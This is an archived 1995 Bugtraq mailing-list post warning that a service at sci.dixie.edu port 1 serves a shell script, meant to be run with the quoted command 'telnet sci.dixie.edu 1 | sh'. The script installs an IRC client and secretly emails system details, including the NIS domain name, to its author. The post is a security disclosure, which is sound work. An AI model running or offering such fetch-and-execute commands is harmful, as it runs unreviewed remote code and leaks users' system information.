Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1995_3

Bugtraq archives for 3rd quarter (Jul-Aug) 1995: telnet sci.dixie.edu 1

telnet sci.dixie.edu 1

Ken Weaverling (weavehopi.dtcc.edu)
Thu, 7 Sep 1995 16:50:56 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Joerg Czeranski: "Re: Linux NIS security problem hole and fix"
Previous message: Ken Weaverling: "Linux NIS security problem hole and fix"

If you telnet to sci.dixie.edu port 1, you get a shell script back. Obviously
this is set up to be run as

telnet sci.dixie.edu 1 | sh

The script builds an executable IRC client, real nice for the novice to
set up IRC on their own.

While that alone bothers me enough, part of the script emails the author
some *interesting* information about your system, including the
NIS domain name.

Next message: Joerg Czeranski: "Re: Linux NIS security problem hole and fix"
Previous message: Ken Weaverling: "Linux NIS security problem hole and fix"